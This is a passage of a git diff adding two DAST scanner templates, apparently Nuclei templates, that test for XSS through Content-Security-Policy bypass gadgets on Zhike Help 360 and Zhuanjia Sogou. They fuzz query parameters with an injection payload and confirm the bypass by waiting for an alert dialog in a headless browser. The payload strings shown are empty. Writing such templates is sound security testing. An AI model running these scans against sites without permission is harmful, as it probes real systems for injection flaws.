"yugiohmonstrosdeduelo_blogspot_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/zhike-help-360-csp-xss.yaml b/dast/vulnerabilities/xss/csp/zhike-help-360-csp-xss.yaml new file mode 100644 index 00000000000..8d8f05a9bfd --- /dev/null +++ b/dast/vulnerabilities/xss/csp/zhike-help-360-csp-xss.yaml @@ -0,0 +1,55 @@ +id: zhike-help-360-csp-xss + +info: + name: Content-Security-Policy Bypass via Zhike Help 360 + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,zhike + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: zhike_help_360_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "zhike_help_360_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/zhuanjia-sogou-csp-xss.yaml b/dast/vulnerabilities/xss/csp/zhuanjia-sogou-csp-xss.yaml new file mode 100644 index 00000000000..deea2df08e2 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/zhuanjia-sogou-csp-xss.yaml @@ -0,0 +1,55 @@ +id: zhuanjia-sogou-csp-xss + +info: + name: Content-Security-Policy Bypass via Zhuanjia Sogou + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,zhuanjia + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: zhuanjia_sogou_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "zhuanjia_sogou_csp_xss == true" \ No newline at end of file